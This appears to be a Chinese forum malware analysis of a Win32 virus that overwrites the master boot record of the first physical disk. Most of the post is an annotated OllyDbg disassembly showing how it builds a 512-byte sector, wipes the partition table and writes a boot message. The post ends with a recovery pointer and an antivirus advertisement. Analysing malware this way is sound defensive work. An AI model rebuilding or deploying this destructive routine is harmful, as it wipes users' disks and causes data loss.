#1 I am virus!
00006048 00406048 0 I am virus! Fuck you :-)
00006064 00406064 0 \\.\PHYSICALDRIVE0

打开物理磁盘 \\.\PHYSICALDRIVE0(CreateFileA,读写访问),用 DeviceIoControl 发 FSCTL_LOCK_VOLUME 锁定(返回值不检查,锁定失败也照样写),然后用 WriteFile 把栈上拼好的 512 字节写到磁盘开头——也就是 MBR:前 48 字节从 0x406030 复制(含 "I am virus! Fuck you :-)" 字符串,字符串之前的 24 字节疑为引导代码),其余全部清零,末尾两字节写入 55 AA 引导签名;因此 0x1BE 处的分区表也被清空,不只是引导代码被替换。最后解锁、关句柄,ExitProcess(-1) 退出。
; --- OllyDbg listing of the sample's entry routine (module "virus", x86 Win32, stdcall) ---
; What it does: builds a 512-byte sector image on the stack and writes it over the first
; sector (the MBR) of \\.\PHYSICALDRIVE0 via CreateFileA + WriteFile, bracketed by
; FSCTL_LOCK_VOLUME / FSCTL_UNLOCK_VOLUME, then calls ExitProcess(-1).
; Frame ("frame" = esp after sub esp,208 / push esi / push edi):
;   [frame+008]          dword scratch for DeviceIoControl lpBytesReturned
;   [frame+00C]          dword scratch for WriteFile lpNumberOfBytesWritten
;   [frame+010..+20F]    512-byte sector buffer: bytes 00..2F copied from 406030,
;                        bytes 30..1FD zero, bytes 1FE/1FF = 55 AA boot signature
; Return: eax = -1 (INVALID_HANDLE_VALUE) when CreateFileA fails; otherwise the routine never
; returns (ExitProcess). retn 10 pops four dword arguments (caller not shown; a WinMain-shaped
; entry would fit).
; Review notes: the results of DeviceIoControl (lock) and WriteFile are never examined, so the
; sector is written even if the lock is refused, and a short or failed write goes unreported.
; Because bytes 30..1FD of the image are zero, the partition table at 1BE..1FD is wiped along
; with the boot code - that is what the recovery article referenced below has to repair.
00401000 /$ 81EC 08020000 sub esp,208 ; 0x208 bytes of locals: 512-byte sector buffer + two dwords
00401006 |. 56 push esi ; preserve callee-saved esi/edi (Win32 stdcall)
00401007 |. 57 push edi
00401008 |. B9 7F000000 mov ecx,7F ; 0x7F dwords = 0x1FC bytes for the rep stos below
0040100D |. 33C0 xor eax,eax ; fill value 0
0040100F |. 8D7C24 11 lea edi,dword ptr ss:[esp+11] ; = sector buffer + 1 (byte 0 is overwritten by the movs copy below)
00401013 |. 6A 00 push 0 ; /hTemplateFile = NULL  (CreateFileA args start; buffer fill is interleaved with the pushes)
00401015 |. F3:AB rep stos dword ptr es:[edi] ; | zero buffer[001..1FC]
00401017 |. 66:AB stos word ptr es:[edi] ; | zero buffer[1FD..1FE]
00401019 |. 6A 00 push 0 ; |Attributes = 0
0040101B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040101D |. AA stos byte ptr es:[edi] ; | zero buffer[1FF]; whole image except byte 0 is now zero
0040101E |. 6A 00 push 0 ; |pSecurity = NULL
00401020 |. B9 0C000000 mov ecx,0C ; | 12 dwords = 48 bytes to copy
00401025 |. BE 30604000 mov esi,virus.00406030 ; | source: 406030..40605F; 406048 (+18) is the "I am virus! Fuck you :-)" text, the 24 bytes before it are not shown here (presumably the 16-bit boot stub that prints it - unverified)
0040102A |. 8D7C24 20 lea edi,dword ptr ss:[esp+20] ; | destination: start of the sector buffer
0040102E |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401030 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00401035 |. F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi] ; | buffer[00..2F] = stub + message
00401037 |. 68 64604000 push virus.00406064 ; |FileName = "\\.\PHYSICALDRIVE0"  (raw handle on the first physical disk)
0040103C |. C68424 2A020000 >mov byte ptr ss:[esp+22A],55 ; | buffer[1FE] = 55h
00401044 |. C68424 2B020000 >mov byte ptr ss:[esp+22B],0AA ; | buffer[1FF] = AAh -> 55 AA signature, so the sector passes the BIOS boot check
0040104C |. FF15 10504000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
00401052 |. 8BF0 mov esi,eax ; esi = hDevice
00401054 |. 83FE FF cmp esi,-1 ; INVALID_HANDLE_VALUE?
00401057 |. 75 0D jnz short virus.00401066 ; opened OK -> lock / write path
00401059 |. 5F pop edi ; failure path: restore esi/edi, return eax (-1)
0040105A |. 0BC0 or eax,eax ; only sets flags; eax stays -1
0040105C |. 5E pop esi
0040105D |. 81C4 08020000 add esp,208
00401063 |. C2 1000 retn 10 ; stdcall return, pops 4 dword args
00401066 |> 8D4424 08 lea eax,dword ptr ss:[esp+8] ; &bytesReturned
0040106A |. 8B3D 0C504000 mov edi,dword ptr ds:[<&KERNEL32.DeviceIoControl>] ; kernel32.DeviceIoControl (edi reused for the unlock call)
00401070 |. 6A 00 push 0 ; /pOverlapped = NULL
00401072 |. 50 push eax ; |pBytesReturned
00401073 |. 6A 00 push 0 ; |OutBufferSize = 0
00401075 |. 6A 00 push 0 ; |OutBuffer = NULL
00401077 |. 6A 00 push 0 ; |InBufferSize = 0
00401079 |. 6A 00 push 0 ; |InBuffer = NULL
0040107B |. 68 18000900 push 90018 ; |IoControlCode = FSCTL_LOCK_VOLUME  (issued on a physical-drive handle, not a volume handle)
00401080 |. 56 push esi ; |hDevice
00401081 |. FFD7 call edi ; \DeviceIoControl -- return value in eax is never tested; execution falls through to the write regardless
00401083 |. 8D4C24 0C lea ecx,dword ptr ss:[esp+C] ; &bytesWritten
00401087 |. 6A 00 push 0 ; /pOverlapped = NULL
00401089 |. 51 push ecx ; |pBytesWritten
0040108A |. 8D5424 18 lea edx,dword ptr ss:[esp+18] ; | = sector buffer
0040108E |. 68 00020000 push 200 ; |nBytesToWrite = 200 (512.)  one sector
00401093 |. 52 push edx ; |Buffer
00401094 |. 56 push esi ; |hFile
00401095 |. FF15 08504000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile -- no SetFilePointer was issued, so this lands at offset 0 (the MBR); return value and bytesWritten are not checked
0040109B |. 8D4424 08 lea eax,dword ptr ss:[esp+8] ; &bytesReturned
0040109F |. 6A 00 push 0 ; /pOverlapped = NULL
004010A1 |. 50 push eax ; |pBytesReturned
004010A2 |. 6A 00 push 0 ; |OutBufferSize = 0
004010A4 |. 6A 00 push 0 ; |OutBuffer = NULL
004010A6 |. 6A 00 push 0 ; |InBufferSize = 0
004010A8 |. 6A 00 push 0 ; |InBuffer = NULL
004010AA |. 68 1C000900 push 9001C ; |IoControlCode = FSCTL_UNLOCK_VOLUME
004010AF |. 56 push esi ; |hDevice
004010B0 |. FFD7 call edi ; \DeviceIoControl (unlock) -- return value ignored as well
004010B2 |. 56 push esi ; /hObject
004010B3 |. FF15 04504000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
004010B9 |. 6A FF push -1 ; /ExitCode = FFFFFFFF
004010BB \. FF15 00504000 call dword ptr ds:[<&KERNEL32.ExitProcess>] ; \ExitProcess -- does not return
写入主引导扇区(MBR,磁盘第 0 扇区)的 512 字节内容(OllyDbg 内存窗口,仅显示 ASCII 列;开头为被复制的 48 字节,中间全为 0,结尾的 U 即 55h 签名字节,其后的 AAh 不可打印):
0012FD38 ?.??|?.? ?.? ?恂I am virus! Fuck you :-)................
0012FD78 ................................................................
0012FDB8 ................................................................
0012FDF8 ................................................................
0012FE38 ................................................................
0012FE78 ................................................................
0012FEB8 ................................................................
0012FEF8 ..............................................................U

解决方法见:论坛内《揭开数据恢复的神秘面纱》一文
顺便打个广告,微点可以成功拦截此类主引导病毒,拦截后扇区不会有任何变化
BY:unknown tycoon
对于未使用微点主动防御软件的用户,建议尽快将您的杀毒软件特征库升级到最新版本进行查杀
